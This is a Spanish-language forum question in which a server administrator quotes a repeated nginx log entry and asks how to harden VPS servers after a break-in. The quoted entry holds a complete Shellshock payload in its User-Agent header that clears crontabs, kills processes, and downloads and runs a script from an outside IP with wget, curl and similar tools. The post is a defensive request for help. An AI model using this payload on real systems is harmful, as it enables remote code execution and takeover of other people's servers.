Acabo de notar esta entrada repetida en el registro de nginx:
31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /cgi-bin/up.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'"
Esto está atacando a gitlab virtualhost, por lo que no hace ningún daño. Tampoco tengo cgi, uso php-fpm para otro host virtual.
Quiero saber si hay alguna contramedida que deba configurarse en el servidor para defenderse contra ataques similares.
PS: Ya configuré las prohibiciones de ip usando iptables y fail2ban en ejecución. Mis otros vps tomados a través de ssh, así que tuve que volver a instalarlo. Todavía estoy en una condición paranoica y quiero reforzar los servidores vps bajo mi control.